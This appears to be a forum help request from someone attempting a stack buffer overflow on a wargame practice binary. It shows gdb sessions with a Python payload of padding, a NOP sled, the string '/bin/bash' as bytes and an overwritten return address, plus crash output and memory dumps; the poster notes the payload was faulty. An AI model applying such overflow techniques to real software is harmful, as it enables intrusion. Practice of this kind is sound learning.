I have run into this issue twice now, and I have no idea what I might be doing wrong. I think I managed to overcome it the first time by adjusting the NOP sled slightly, but that doesn’t seem to be working on this program.

I am always able to overwrite the EIP address with \x66 bytes, no problem.

“` Starting program: /levels/level1 $(python -c “print ‘\x55’ * (1040 – 128 – 9 – 4) + ‘\x90’ * 128 + ‘\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68’ + ‘\x66’ * 4”)

Program received signal SIGSEGV, Segmentation fault. 0x66666666 in ?? () “`

However when I actually set an address in the middle of my NOP sled, it comes out incorrectly for some reason.

“` 0xbffffcfe: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffd06: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffd0e: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffd16: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffd1e: 0x90 0x90 0x90 0x90 0x2f 0x62 0x69 0x6e 0xbffffd26: 0x2f 0x62 0x61 0x73 0x68 0x66 0x66 0x66 0xbffffd2e: 0x66 0x00 0x53 0x48 0x45 0x4c 0x4c 0x3d 0xbffffd36: 0x2f 0x62 0x69 0x6e 0x2f 0x62 0x61 0x73

Starting program: /levels/level1 $(python -c “print ‘\x55’ * (1040 – 128 – 9 – 4) + ‘\x90’ * 128 + ‘\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68’ + ‘\xfe\xfc\xff\xbf'”)

Program received signal SIGSEGV, Segmentation fault. 0xbffffd23 in ?? () “`

As you can see, it keeps pointing to the second byte of my payload, no matter which address I choose within the NOP sled.

I assume there’s something I’m missing here, but I’m not sure what it might be. Any pointers?

EDIT

Solved! The payload was bad (my fault). See comment below for details.